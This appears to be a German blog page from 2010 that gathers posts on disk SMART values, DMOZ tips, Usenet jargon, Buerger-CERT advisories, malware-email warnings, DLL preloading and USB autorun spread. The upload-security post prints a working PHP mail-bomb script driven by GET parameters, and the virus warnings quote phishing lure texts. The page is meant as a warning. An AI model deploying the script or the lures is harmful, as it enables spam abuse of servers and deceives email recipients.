    Loaded Hours Gibt an, wie lange die Platte unter Volllast stand. Der Indikator dafür sind die Bewegungen des Plattenarms.
    Load/Unload Retry Count Zählt in einer undokumentierten Einheit, wie oft die Schreib-Leseköpfe die Position geändert haben
    Load Friction Zeigt einen statistischen Wert, wie hoch der Reibungswiederstand beim Bewegen des Plattenarmes ist
    Load-in Time Gibt an, wie lange sich der Plattenarm nicht in der Landing Zone geparkt war.
    Torque Amplification Count Zählt, wie oft die interne Logik der Platte das Drehmoment neu anpassen musste
    GMR Head Amplitude Ein rein statistischen Wert über die zurückgelegte Distanz der Schreib-Leseköpfe während einer Bewegung.

    Passende Programme zum Auslesen der SMART Werte:

    Open Directory Project (ODP)

    Um eine WebSite beim größten, am meisten verbreiteten und genutzten Webkatalog der Welt erfolgreich und schnell anmelden zu können, sollten Sie bestimmte Aufgaben schon vor Ihrem Antrag auf  DMOz.org erledigen.
    • Warten Sie mit der Anmeldung bis zur vollständigen Fertigstellung
    • Überprüfen Sie vor der Anmeldung, ob Ihre Seite bereits aufgenommen ist
    • Wählen Sie die passende Kategorie aus
    • Erstellen Sie einen passenden Titel
    • Formulieren Sie Sie eine gute Beschreibung
    • Geben Sie Ihre Hauptdomain an
    • Melden Sie Ihre Seite nur einmal an
    • Speichern Sie alle Ihre Angaben
    • Nutzen Sie die 'Eintrag aktualisieren' Funktion
    Wenn Sie das  Open Directory Project (ODP) in Ihre WebSite als eigenen WebKatalog einbinden möchten, dann empfehlen wir Ihnen das kostenlose PHP Script DWodp von Dominion Web

    Online genutzte Abkürzungen

    Die folgenden Abkürzungen beziehen sich eigentlich auf das Usenet, haben sich aber in der Zwischenzeit auf sämtlichen Online Plattformen und in den sozialen Netzwerken eingebürgert.
    Das Usenet (urspr. Unix User Network – engl. „Netzwerk für die Benutzer von Unix“) ist ein weltweites, elektronisches Netzwerk, das Diskussionsforen (so genannte „Newsgroups“) aller Art bereitstellt und an dem grundsätzlich jeder teilnehmen kann. 

    ACK - Acknowledge – Zustimmung. Gegenteil: NACK.
    AFAIK – As far as I know – Soweit ich weiß
    AFAIR – As far as I remember – Soweit ich mich erinnere
    AFAI(C)S – As far as I (can) see – Soweit ich die Sache überblicke(n kann)
    aka - also known as ... – auch bekannt als ...
    AOL - „Finde ich auch“.
    Artikel, Posting - Einzelner Beitrag in einer Gruppe. Das Abschickens eines Artikels nennt man „posten“.
    BOFH - Bastard Operator From Hell
    BTDT - Been there, done that – „ich war da und hab’s selbst probiert“ GTLT got that lousy T-shirt – „und hab dieses blöde T-Shirt bekommen“.
    BTW - By The Way – Übrigens...
    Cancel, canceln - Löschen eines Artikels. 
    CMIIW - Correct me if I’m wrong – „Korrigiert mich, wenn ich falsch liege“.
    Crossposting - X-Posting  xpost - Wenn man einen Artikel in mehrere Gruppen senden will
    DAU - Dümmster Anzunehmender User
    /dev/null - Untschüss.
    EOD - End of discussion – „damit ist das Thema für mich erledigt, ich werde mich nicht mehr dazu äußern.“
    EOT - End of thread/topic - Vorschlag, eine (fruchtlose) Diskussion komplett zu beenden.
    FAQ - (gesprochen entweder „Eff-Ah-Kuh“ oder, wenn du dich traust, „fack“)
    Frequently Asked Questions,  „Fragen, die immer wieder gestellt werden“
    Flame - persönlich verletzender Artikel
    Flamewar - Artikel der alle Mitleser einfach nur genervt.
    Follow-Up - Abkürzung: „F'up“. Artikel, der auf einen anderen Artikel Bezug nimmt.
    Followup-To - Abkürzung: „F'up2“ - Angabe im Header, wohin Follow-Ups geschickt werden.
    FRZ - Fragezeichen
    „fuppen“ - Verb zu „F’up2“. Umleiten einer Diskussion
    GABELN - Gruppe Area Brett Echo Liste Newsgroup.
    Gruppe, Newsgroup, Forum - „Schwarzes Brett“ im Usenet, an dem sich die Artikel befinden.
    ^H - aus Versehen etwas falsches gesagt
    ^W -  aus Versehen etwas falsches gesagt
    Header - „Briefkopf“ eines Artikels
    HTH - Hope that helps – „Ich hoffe, deine Frage ist damit zumindest so weit beantwortet, dass du erst einmal weiter kommst...“
    IANAL -  I am not a lawyer – „Ich bin kein Jurist“ - „Disclaimer“
    IBTD - I beg to differ – „Bei allem Respekt, ich bin anderer Meinung“.
    IIRC - If I remember/recall correctly – „Wenn ich mich recht erinnere...“
    IM(H)O - In my (humble) opinion – „Meiner (bescheidenen) Meinung nach...“
    die ~ machen - Ein Followup auf einen eigenen Artikel schreiben
    IOW - In other words – „Mit anderen Worten...“
    IRL - In Real Life – „im wirklichen Leben“
    Jehova - Rotes Tuch - „JHVH“. Strenggläubigen Juden ist es verboten, diesen Namen in den Mund zu nehmen. 
    JFTR - Just for the record – „nur fürs Archiv“ - „nur zur Kenntnis“.
    Killfile - Filterliste
    LART - Luser Attitude Readjustment Tool –  „Werkzeug zum Neuabgleich der Einstellung des Lusers“
    LOL - Laugh out loud – Lautes Lachen.
    RO(T)FL – Rolling On The Floor Laughing („wälze mich vor Lachen auf dem Boden“).  ROFLASTC – ...And Scaring The Cat. Beliebig weiterführbar.
    ROTFLBTCDICAJTTWADBSISWTRHITSBKABAYB: „Rolling On The Floor Laughing, Biting The Carpet, Dancing In Circles And Jumping Through The Window Almost Dying By Smashing Into Someone Who Then Runs Horrified Into The Street Being Killed Accidentally By A Yellow Bulldozer“
    lurken, Lurker - „still“ mitlesen
    man [...] -  „man ...“  „Informiere dich bitte über [...], dann kannst du deine Frage selbst beantworten.“
    Multiposting - → Crossposting
    MUSEN - Meinem unmaßgeblichen Sprachempfinden nach.
    Netcop -  Rentnern mit Fernglas hinter der Gardine
    Netiquette - elementare Benimmregeln für’s Usenet
    Newbie - im Usenet noch neu
    Newsreader - Programm für das Usenet
    NUA - News User Agent – anderes Wort für Newsreader.
    Nuhr - „Wenn man keine Ahnung hat: Einfach mal Fresse halten!“
    OjE - User des Microsoft- Newsreader Outlook Express.
    OP - Originalposting oder Originalposter
    OT - Off topic – nicht zum Thema bzw. Themenbereich der Gruppe gehörend
    Pawlow - eine mechanische und oft unangebrachte Reaktion
    Plenken - vor Satzzeichen (besonders Frage- und Ausrufzeichen) einen Leerschritt setzen.
    *PLONK* - Der Name eines Mitlesers auf dem Boden eines Killfiles aufgeschlagen
    PM - Private Mail
    Pointer - Stelle, wo eine Information zu finden ist
    Popcorn - Diskussion zu einem Thema, das schon x Mal durchdiskutiert wurde
    posten - Abschicken eines Usenet- Artikels
    Pratchett - „Mehrfache Ausrufzeichen sind ein sicheres Zeichen eines kranken Geistes“
    Quote, Zitat
    ROT13 - alphabetische Rotation um 13 Stellen
    RTFM - Read that f***ing manual! – „Lies das verd***te Handbuch!“
    s/abc/xyz/ - Kurzform für: „Ersetze abc durch xyz“.
    SCNR - Sorry, could not resist – „Entschuldigung, das konnte ich mir nicht verkneifen“
    score adjusted - „ Scorefile angepasst“
    Scorefile - „Intelligentes“ Bewertungssystem für Newsartikel
    Shift-Taste, defekte - Eigenwillige Auslegung der Regeln zur Groß- und Kleinschreibung
    Signatur, Sig - Fußzeile eines Postings
    sinnfrei - „sinnlos“ oder „unsinnig“.
    Spellflame - Missbrauch von Rechtschreibschwächen des Diskussionsgegners als Argument
    Subject - Betreffzeile eines Artikels
    Supersedes - Ein Artikel, der einen anderen ersetzt
    Tante Gu - Weiß alles!
    Thread - Gesamtheit eines Originalpostings und sämtlicher Follow-Ups
    TIA - Thanks In Advance – „Danke im Voraus“
    Tischkante -  beißt vor Lachen in die Tischkante
    TLA - Three Letter Acronym – „Drei-Buchstaben-Abkürzung“.
    [tm] - Kürzel für „trademark“
    TOFU - logische Folge von Frage und Antwort wird auf den Kopf gestellt.
    Troll, Elch - bewusst herumpöbelnder Artikel
    Usenetverwaltung - jeder passt auf sich selbst auf.
    -v - „Das verstehe ich so nicht – könntest du es mal etwas ausführlicher darlegen?“
    WFM - Works For Me – „Bei mir geht’s“
    Wowereit - „Und das ist auch gut so“.
    WWG - „Wieder was gelernt“
    xf'up2 - Abkürzung für „ X-Post & F'up2 “
    Xpost - Abkürzung für Crosspost.
    YMMD - You Made My Day – „Du hast mir den Tag gerettet“
    YMMV - Your Mileage May Vary  „Unter anderen Umständen kann man natürlich auch zu ganz anderen Ergebnissen/Ansichten kommen“.
    42 - „Zweiundvierzig“, niemand weiß mehr, wie die Frage eigentlich genau lautet.
    != - „... ist etwas anderes als ...“

    Mittwoch, 22. September 2010

    Cuil SEO ist DOWN

    Cuil ist ähem war eine recht intensive Suchmaschine und die ist inzwischen DOWN oder genauer weg vom Fenster
    Wir fanden diese Suchmaschine  zwar recht gut vor allen Dingen als Webmaster wegen den diversen Möglichkeiten / Features für die eigene Homepage, aber das genügte wohl nicht um im Kampf der Giganten zu bestehen. Schade drum! Ansonsten hätten wir es noch vor ein paar Jahren nicht für möglich gehalten, daß eine so große Suchmaschine pleite gehen kann! Aber anscheinend ist heute wirklich nichts mehr unmöglich. An der Qualität der Suchmaschine lag es nach unserem Ermessen nicht, wohl eher an der fehlenden Resonanz Ihrer Besucher!

    Ausführliche Meldung (in English)

    Samstag, 11. September 2010

    Mal ein kleiner Test für die Sicherheit

    Ich probier mal was und das ist die Sicherheit im Internet zu erhöhen indem ich Sicherheitswarnungen von anderen hier in meinem Blog mit veröffentliche. Ich nehme an, daß durch die Einbindung des RSS-Feeds vom Blog in anderen Webseiten und die RSS-Feed Abos diese wichtigen Sicherheitsinformationen besser verbreitet werden und das Netz dadurch sicherer wird.

    Meine Absicht ist es:
    Die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI) und die eMail - Virenmeldungen des Viren - Tickers in Monaten zusammengefasst zu posten.
    ...
    Noch ne wichtige Anmerkung:
    Sämtliche Sicherheitsmeldungen bedeuten nicht, daß die Konkurrenzprodukte deshalb sicherer sind. Tatsächlich bedeuten diese Meldungen nur, daß hier etwas für die Sicherheit getan und nicht darüber geschwiegen wurde, bis die ganze Cyberwelt es heraus schreit!

    Es folgen die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI)


    Zusammenfassung der Technischen Warnungen im Monat September
    Die Details der Meldungen sind fuer Sie online abrufbar unter
    http://www.buerger-cert.de
    -----------------------------------------------------------------------
    Sicherheitsupdate fuer Adobe Flash Player [Bcert-2010-0093/1]
    Risiko: Hoch
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0093
    -----------------------------------------------------------------------
    Microsoft Patchday September 2010 [Bcert-2010-0094/1]
    Risiko: Mittel
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0094
    -----------------------------------------------------------------------
    Apple Mac OS X Sicherheitsupdate 2010-006 [Bcert-2010-0095/1]
    Risiko: Mittel
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0095
    -----------------------------------------------------------------------
    -----------------------------------------------------------------------
    Apple QuickTime Player 7.6.8 [Bcert-2010-0092/1]
    Risiko: Hoch
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0092
    -----------------------------------------------------------------------
    -----------------------------------------------------------------------
    Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
    [Bcert-2010-0088/1]
    Risiko: Hoch
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0088
    -----------------------------------------------------------------------
    Apple Safari Safari 5.0.2 and Safari 4.1.2 [Bcert-2010-0089/1]
    Risiko: Hoch
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0089
    -----------------------------------------------------------------------
    Apple iPhone und iPod Touch [Bcert-2010-0090/1]
    Risiko: Mittel
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0090
    -----------------------------------------------------------------------
    Adobe Reader und Acrobat 9.3.4 [Bcert-2010-0091/1]
    Risiko: Hoch
    Komplette Meldung:
    http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0091
    -----------------------------------------------------------------------
    Mal sehen ob was nützliches dabei herauskommt?


    Technische Warnungen des Buerger-CERT
    [Bcert-2010-0093/1]:
    Sicherheitsupdate fuer Adobe Flash Player

    Risiko: Hoch

    Betroffene Systeme:
    Adobe Flash Player Version 10.1.82.76 und frueher fuer Windows, Macintosh, Linux und Solaris
    Adobe Flash Player Version 10.1.92.10 und frueher fuer Android
    Adobe Flash Player vor Version 9.0.283

    Empfehlung:
    Das Buerger-CERT empfiehlt die zeitnahe Aktualisierung des Adobe Flash Players (10.1.85.3 fuer Windows, Macintosh. Linux und Solaris bzw. 10.1.95.1 fuer Android) fuer den jeweils genutzten Browser. Bei dem Adobe Flash Player geschieht dies am einfachsten ueber die integrierte Update-Funktion oder ueber die Webseite
    http://get.adobe.com/flashplayer/
    Anwender des Flash Players fuer Android Version 10.1.92.10 und frueher koennen die Aktualisierung ueber den Android Marketplace durchfuehren.
    Adobe bietet eine Webseite [2] zur Pruefung der aktuell installierten Flash Player Version an. Bei dem Einsatz mehrerer Browser sollte die Pruefung fuer jeden einzelnen Browser durchgefuehrt werden.
    Fuer Anwender, die nicht auf Flash Player 10.1.85.3 aktualisieren koennen, stellt Adobe eine aktualisierte Flash Player Version 9.0.283 bereit [3].

    Beschreibung:
    Adobe behebt mit dem Sicherheitsupdate fuer den Flash Player eine kritische Schwachstelle, die es einem Angreifer ermoeglicht, beliebigen Code auf betroffenen Systemen auszufuehren. Hierfuer reicht bereits der Besuch einer vom Angreifer praeparierten Webseite.
    [Bcert-2010-0088/1]:
    Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey

    Risiko: Hoch

    Betroffene Systeme:
    Mozilla Firefox vor Version 3.6.9
    Mozilla Firefox vor Version 3.5.12
    Mozilla Thunderbird vor Version 3.1.3
    Mozilla Thunderbird vor Version 3.0.7
    SeaMonkey vor Version 2.0.7

    Empfehlung:
    Das Buerger-CERT empfiehlt Nutzern des Webbrowsers Firefox und des E-Mail-Clients Thunderbird die von ihnen genutzte Versionsreihe zu aktualisieren. Der Support der Firefox-Versionsreihe 3.5 ist ausgelaufen.
    Am einfachsten ist ein Update ueber die integrierte Update-Funktion moeglich:
    Menue "Hilfe", "Nach Updates suchen..." bzw. "Firefox/Thunderbird aktualisieren".
    Alternativ stehen die Installationspakete auf folgenden Webseiten zum Herunterladen bereit:
    Firefox 3.6.9
    http://www.mozilla.com/de/
    Firefox 3.5.12
    http://www.mozilla.com/en-US/firefox/all-older.html
    Thunderbird 3.1.3
    http://www.mozillamessaging.com/de/
    Thunderbird 3.0.7
    http://www.mozillamessaging.com/en-US/thunderbird/all-older.html
    SeaMonkey 2.0.7
    http://www.seamonkey-project.org/releases/

    Beschreibung:
    Ein Angreifer kann die von den Mozilla-Entwicklern in Firefox und Thunderbird geschlossenen Schwachstellen ausnutzen, um Informationen auszuspaehen, einen Absturz der Anwendung auszuloesen oder beliebigen Code zur Ausfuehrung zu bringen.
    [Bcert-2010-0089/1]:
    Apple Safari Safari 5.0.2 and Safari 4.1.2

    Risiko: Hoch

    Betroffene Systeme:
    Apple Safari vor Version 5.0.2
    Apple Safari vor Version 4.1.2

    Empfehlung:
    Das Buerger-CERT empfiehlt das von Apple bereitgestellte Safari-Sicherheitsupdate so rasch wie moeglich zu installieren. Dies geschieht unter Mac OS X am einfachsten ueber die integrierte Funktion "Software Aktualisierung" des Betriebssystems bzw. unter Microsoft Windows mit der Anwendung "Apple Software Update".
    Alternativ kann das Safari-Update auch manuell von der Apple
    Download-Webseite heruntergeladen werden:
    http://support.apple.com/downloads/

    Beschreibung:
    Mit den Safari Versionen 5.0.2 und 4.1.2 schliesst Apple drei Sicherheitsluecken im Browser. Die Ausnutzung der Sicherheitsluecken ermoeglicht einem entfernten Angreifer mithilfe von praeparierten Webseiten u.a. die Ausfuehrung von Schadcode auf dem System des Opfers.
    [Bcert-2010-0091/1]:
    Adobe Reader und Acrobat 9.3.4

    Risiko: Hoch

    Betroffene Systeme:
    Adobe Reader und Acrobat Version 9.3.4 und frueher

    Empfehlung:
    Ein Patch des Herstellers steht derzeit nicht zur Verfuegung. Derzeit verwenden die praeparierten PDF-Dokumente zur Ausnutzung dieser Sicherheitsluecke JavaScript. Daher eine Deaktivierung von JavaScript grundsaetzlich sinnvoll.
    Dies ist in Adobe Reader und Acrobat ueber das Menue
    "Bearbeiten" > "Voreinstellungen..." > Kategorie "JavaScript"
    moeglich. Entfernen Sie zur Deaktivierung von JavaScript in PDF-Dokumenten den Haken vor der Option "Acrobat JavaScript aktivieren" und bestaetigen Sie das Fenster mit der Schaltflaeche "OK".
    Diese Massnahme bietet allerdings keinen vollstaendigen Schutz vor Ausnutzung der Schwachstelle.

    Beschreibung:
    Adobe warnt vor einer neuen Sicherheitsluecke im Adobe Reader und Acrobat 9.3.4 sowie frueheren Versionen fuer Windows, Mac und Unix. Die Sicherheitsluecke wird bereits aktiv ausgenutzt, um ueber manipulierte PDF-Dokumente Windows-PCs zu kompromittieren.


    Durch eMails verbreitete Viren


    Zusammenfassung der Virenmeldungen im Monat September
    Die Details der Meldungen sind fuer Sie online abrufbar unter
    http://www.viren-ticker.de/

    Angeblicher Abbuchungsauftrag versucht einen Trojaner einzuschleusen
    Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 5.672 Euro hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich kein Abbuchungsauftrag, sondern der heimtückische Trojaner iBill.T, der das betreffende System infizieren will.
    Die E-Mail hat folgendes Aussehen:
    Betreff: Leihvertrag
    Dateianhang: Rechnung.rar
    Größe des Dateianhangs: 65 KByte
    E-Mail-Text: „Sehr geehrter Kunde, sehr geehrte Kundin!
    Ihr Abbuchungsauftrag Nr. 140525114897 wurde erfüllt.
    Ein Betrag von 5672.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als "Paypalabbuchung " angezeigt.“
    Betroffene Betriebssysteme: Alle Windows-Versionen
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    Wurm tarnt sich als fehlgeleitete E-Mail
    Der Wurm Mytob.A wieder unterwegs. Der Wurm versteckt sich im Anhang einer E-Mail, die scheinbar nicht zugestellt werden konnte. Nähere Angaben zu dieser E-Mail können Sie angeblich der im Anhang befindlichen Datei entnehmen. Und das ist natürlich gelogen.
    Wird die sich im Anhang befindende Datei durch einen Doppelklick geöffnet, erhält man keine Informationen über die entsprechende E-Mail, die nicht zugestellt werden konnte. Stattdessen installiert sich der Wurm auf dem betreffenden System.
    Die E-Mail hat folgendes Aussehen:
    Betreff: „Mail Delivery System”
    Dateianhang: „body.zip.exe“.
    Größe des Dateianhangs: 41.824 Bytes.
    E-Mail-Text: „Mail transaction failed. Partial message is available.“
    Betroffene Betriebssysteme: Alle Windows-Versionen
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    Gefahr durch falschen Abbuchungsauftrag
    Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang stecken natürlich keine Informationen über den Abbuchungsauftrag, sondern der heimtückische Wurm Klez.E7, der das betreffende System infizieren will.
    Die E-Mail hat folgendes Aussehen:
    Betreff: Vertrag
    Dateianhang: Rechnung.rar
    Größe des Dateianhangs: 65 KByte
    E-Mail-Text: „Sehr geehrte Kundin, sehr geehrte Kunde,
    Ihr Abbuchungsauftrag wurde erfüllt. Sie finden die Details zu der Rechnung im Anhang.“
    Betroffene Betriebssysteme: Alle Windows-Versionen
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    Wurm lockt mit nackter Fußball-Mannschaft
    Der Wurm Soccer.C lockt mit Bildern einer angeblich nackten Fußball-Mannschaft. Im Anhang der E-Mail befinden sich dann wie immer keine Bilder, sondern der Wurm lauert darauf, das betreffende System zu kapern.
    Die E-Mail hat folgendes Aussehen:
    Betreff: „Naked World Cup game set“
    Dateianhang: soccer_nudist.bmp.exe
    E-Mail-Text: „Nudists are organising their own tribute to the world cup, by staging their own nude soccer game, though it is not clear how the teams will tell each other apart. Good photos ;)“.
    Dateigröße: 39.904 Bytes
    Betroffene Betriebssysteme: Alle Windows-Versionen
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    E-Mail aus China lockt mit angeblichen Dokument im Anhang
    Der Wurm Traxgy.B5 ist unterwegs und verstopft die E-Mail-Postfächer. Im Anhang befindet sich ein angebliches Dokument. Die E-Mail ist leicht zu erkennen, da Betreff und E-Mail-Text aus chinesischen Schriftzeichen bestehen. Im Anhang befindet sich aber eine Datei mit der Bezeichnung Document.
    Nach einem Doppelklick auf die im Anhang befindliche Datei, wird jedoch kein Dokument mit dem verknüpften Textverarbeitungsprogramm geöffnet, stattdessen installiert sich der Wurm auf dem System.
    Die E-Mail hat folgendes Aussehen:
    Betreff: %chinesischer Text%
    Dateianhang: Document
    Dateierweiterung: .exe
    Größe des Dateianhangs: 57.344 Bytes
    E-Mail-Text: %chinesischer Text% Document.exe %chinesischer Text%
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    Trojaner kommt mit falscher Rechnung von Amazon
    Es werden E-Mails versandt, die angeblich von Amazon stammen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 715 Euro für einen bestellten Laptop hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich keine Rechnung, sondern ein heimtückischenr Trojaner, der das betreffende System infiziert.
    Die E-Mail hat folgendes Aussehen:
    Betreff: „Ihre Bestellung 2984234 bei Amazon.de“.
    Dateianhang: „Rechnung.doc.zip“
    E-Mail-Text: „Vielen Dank für Ihre Bestellung bei Amazon.de!
    Das Sony VAIO Notebook wird in Kürze versendet. Die Kosten von 715,- Euro werden Ihrem Konto zu Last gelegt. Die Einzelheiten zu Ihrer Bestellung entnehmen Sie bitte der angefügten Rechnung. Falls Sie die Bestellung stornieren möchte, bitte den in der Rechnung angegebenen Kundenservice anrufen und Ihre Bestellnummer bereithalten. Eine Kopie der Rechnung wird Ihnen in den nächsten Tagen schriftlich zugestellt.
    Virus: Dldr.iBill.Z
    Virustyp: Trojaner
    Dateigröße: 12.800 Bytes
    Betroffene Betriebssysteme: Alle Windows-Versionen
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    Gefälschter Office-Patch versucht Ihr System zu kapern
    Der Trojaner Badware12 ist unterwegs und versucht Anwendern ein falsches Microsoft Office-Update vorzugaukeln. Die E-Mail ist angeblich vom Onlinedienst MSN und enthält ein Update für Office 2007. Das ist natürlich gelogen: Wer dem Link in der E-Mail folgt, erhält kein Update, sondern einen gefährlichen Trojaner untergeschoben.
    Die E-Mail hat folgendes Aussehen:
    Betreff: „Update for Office 2007 only“
    E-Mail-Text: unterschiedlicher Text
    Betroffene Betriebssysteme: Alle Windows-Versionen
    mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

    Dienstag, 7. September 2010

    Die Zeiten sind Scheiße

    Und werden sicherlich noch beschissener!
    Wer es trotzdem nicht lassen kann und sich für die bürgerlichen Werte unserer freiheitlichen demokratischen Grundordnung einsetzen will, wenn es sein muß, der / die / das sollte sich von denen, die täglich damit zu tun haben, beraten lassen, denn Hollywood ist verdammt weit weg und die harte Realität unterscheidet sich immens von der schönen heilen Welt, die uns neben den häslichen Nachrichten täglich aus den Medien berieselt.

    So kann ich helfen (richtig)

    http://www.aktion-tu-was.de/

    Zitat:
    Zivilcourage lässt sich lernen – zum Beispiel im Unterricht oder in der Jugendarbeit. Speziell hierfür entwickelt wurde ein Medienpaket, das aus einer DVD und einem Filmbegleitheft besteht. Die DVD enthält vier Filme, die das Thema "Zivilcourage" im Zusammenhang mit den Aspekten Alkohol/Gewalt, Drogendeal, Handyraub und Ladendiebstahl behandeln.

    Kleiner Surftip am Rande:
    https://www.buerger-cert.de/archiv.aspx

    Mit Dateiuploads sich den Tag versauen

    Wir haben schon auf allen möglichen Websites darauf hingewiesen, Dateiuploadmöglichkeiten genügend abzusichern. folgende kleines Snippet soll zeigen, wie stinkeinfach es ist eine WebSite mit Dateiupload als Spam und Virenschleuder zu verwenden.

    $t="Sp0wnd!";
    $n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
    $a="~B@(ksT0r~";
    $e=$_GET['e'];
    $az=$_GET['az'];

    for($i=0;$i<$az;$i++){
    mail($e, $t, $n,"From: $a <$a>");
    }
    ?>

    Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.

    Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
    http://www.google.com/recaptcha

    Die DLL Suchroutine beeinflussen

    Der zweite Beitrag im Virenbastelkurs dieses Monats befasst sich mit einer zur Zeit sehr beliebten Masche bei der über eine vorab geladene DLL die User einschließlich der Schutzsysteme überlistet werden.
    Microsoft hat anscheinend auf Grund der vielfältigen Konfigurations- und daraus folgenden Fehlermöglichkeiten des Patches auf den beliebeten One Klick Button zu verzichten. Ist wohl wirklich nicht möglich es einigermaßen passend zu gestalten, ohne allzu viele wütende Kunden zur Konkurrenz zu treiben!

    Jeder Programmierer weiß das die OS Ihre Daten auf einem vorgeschriebenen Weg suchen. mit Einführung der vielen Applikationen die inzwischen über das Web laufen, kam wohl irgendjemand die Idee, na dann kann ich ja auch DLLs des Zielsystems auf meinem Server aufrufen lassen. Im Zusammenhang mit dem ClickJacking kann dabei natürlich echt die Post abgehen,.dementsprechend bleibt folgerichtig nur eine vorherige starre Beeinflussung des Suchweges übrig.
    Deshalb muß zum Schutz als erstes der DLL Suchpfad angepasst.

    Ein neuer Registrierungseintrag "CWDIllegalInDllSearch" zum Steuern des DLL-Suchpfadalgorithmus ist verfügbar

    Fachchinesisch
    Dieses Update führt den neuen Registrierungseintrag CWDIllegalInDllSearch ein, mit dem Benutzer den DLL-Suchpfadalgorithmus steuern können. Der DLL-Suchpfadalgorithmus wird von der LoadLibrary-API und der LoadLibraryEx-API verwendet, wenn DLLs ohne Angabe eines vollqualifizierten Pfads geladen werden.

    Genaue Erläuterung bei Microsoft:
    http://support.microsoft.com/kb/2264107
    am Ende der Seite muß im ersten Schritt als erstes der passende Patch für das OS des Zielrechners heruntergeladen und installiert werden.

    Als Zweites muß das FixIT heruntergeladen und installiert werden.
    bei Technet
    An update on the DLL-preloading remote attack vector

    http://blogs.technet.com/b/srd/archive/2010/08/31/an-update-on-the-dll-preloading-remote-attack-vector.aspx

    Hinterher muß natürlich noch der/die schlaue Sysadmin das FixIt gut und passend zu konfigurieren, woran die meisten wohl scheitern werden. Was natürlich im Rückschluß ein richtig tolles Potential zur Verfügung stellt!

    Bleibt nur zu Wünschen übrig, daß sich ein ausreichend dummer Hund findet, dieses Scheunentor im Sicherheitssystem zu stopfen!

    Virenverbreitung per USB macht sich breit

    Auch wenn ich mal wieder frage, wo das Hirn bei jungen Menschen abgeblieben ist, so möchte ich doch auf eine recht simple aber sehr effektvolle, weil mal wieder von hinten ausgeführte, Verbreitung von Viren aufmerksam zu machen. USB Anschlüsse sind die am weitesten verbreitete Art IT Geräte miteinander zu verbinden. Dabei wird für die vielen lukrativen Computergenies die Windows interne Autorun.inf  Funktionalität genutzt von den guten und den Bösen. Jede poppelige Autorun.inf ist nur eine primitive Text Datei. Der Unterschied zwischen den Beiden ist die Gute verweist auf ein ordentliches Anwendungsprogramm und die Böse auf einen Virus.

    Tja manche Böse sind mit guten Verbindungen ausgestattet, davon kann Panda und Vodafone ein Liedchen trällern, der Text geht ungefähr so:
    Eine spanische Panda Mitarbeiterin entdeckte Anfang März schädliche Software auf ihrem neu erstandenen Smartphone HTC Magic von Vodafone. Als sie das Handy über USB an ihren PC anschloss, schlug die installierte Panda Cloud Antivirus Software sofort Alarm. Eine Analyse ergab, dass es sich bei dem Handy tatsächlich um einen Mariposa Bot Client handelte. Zusätzlich entdeckte unser spanischer Malware-Experte Pedro Bustamante weitere Malware wie den Conficker-Wurm und einen Trojaner auf der Speicherkarte des Vodafone-Geräts.

    Der Text von Panda geht hier weiter:
    http://www.pandasecurity.com/germany/enterprise/media/press-releases/viewnews?noticia=10120

    Der Text von Panda & Vodafone geht hier weiter:
    http://research.pandasecurity.com/vodafone-distributes-mariposa/

    Wer sich diese Art der Virenverbreitung mit Proggys vom Hals halten möchte:
    mit Vaccine bei Panda:
    http://free.pandasecurity.com/de/

    mit Tweak UI bei Microsoft:
    http://www.microsoft.com/windowsxp/downloads/powertoys/default.mspx

    mit dem Autorun.inf Editor von Karen's Power Tools
    http://www.karenware.com/powertools/powertools.asp

    Für andere die es mit Grips versuchen:
    in English:
    http://msdn.microsoft.com/de-de/library/bb776825.aspx

    in Deutsch:
    http://www.fz-juelich.de/jsc/files/net/security/inf-xp/No-AutoRun/no-autorun-zam.htm

    Sonntag, 15. August 2010

    Baden von franky4you - Google 3D-Galerie

    Aktuell ist Googles Streetview auf jeder gedruckten Regenbogenseite zu finden, während ein paar Seiten gut bezahlte Annoncen des regionalen oder lokalen Fleischmarktes die Spalten füllen oder unseriöse Jobangebote unbegründet Reichtum durch Arbeit versprechen, schwingt sich jeder Tintenklecks bei ein paar ollen Bildchen von der Straße zur edlen Burg des Datenschutzes auf.

